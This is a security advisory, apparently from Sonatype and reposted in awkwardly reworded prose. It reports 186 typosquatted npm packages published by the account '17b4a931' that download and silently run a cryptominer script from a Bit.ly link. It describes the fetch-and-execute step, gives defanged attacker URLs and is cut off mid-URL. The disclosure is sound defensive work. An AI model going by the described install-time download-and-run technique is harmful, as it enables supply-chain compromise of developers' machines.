Sonatype has noticed 186 malicious packages flooding the npm registry at this time. These packages infect Linux hosts with cryptominers by downloading a malicious Bash script from the risk actor’s server through the Bitly URL shortener service. Our discovery follows one other researcher’s discovery of 55 PyPI packages from this week, that additionally pull crypto miners in an an identical vogue from the identical offending URL.
186 counterfeit npm packages drop cryptominers
The whole listing of 186 packages we recognized is present in this PDF.
All of those packages have been revealed from a pseudonymous npm account referred to as “17b4a931.”
Many of those packages are typosquats and goal customers of recognized libraries like React (typosquat being ‘r2act’) and QT (through ‘qtt’ typosquat).
The index.js file contained inside these packages reveals they’re the truth is pulling the professional ‘http-errors’ library from npm, in order to not elevate eyebrows. However, let’s admit, the names of those packages are drastically completely different from ‘http-errors’ regardless of how spectacular a job they could do in impersonating the venture’s README verbatim.
Scrolling down previous just a few strains of code reveals some sinister exercise:
On Line 115, we see the packages are pulling content material from a Bit.ly URL and silently executing this script whereas muting its output (through >/dev/null).
The developer behind these malicious packages has even left a snarky remark within the code, acknowledging the malware, being a Bash script, would run on Unix-based techniques solely:
“if ur utilizing home windows for putting in this bundle ur 1 fortunate son of a *****”
And the Bit.ly URL redirects to the handle proven under:
https://bit[.]ly/3c2tMTT => http://80.78.25[. (Read more…)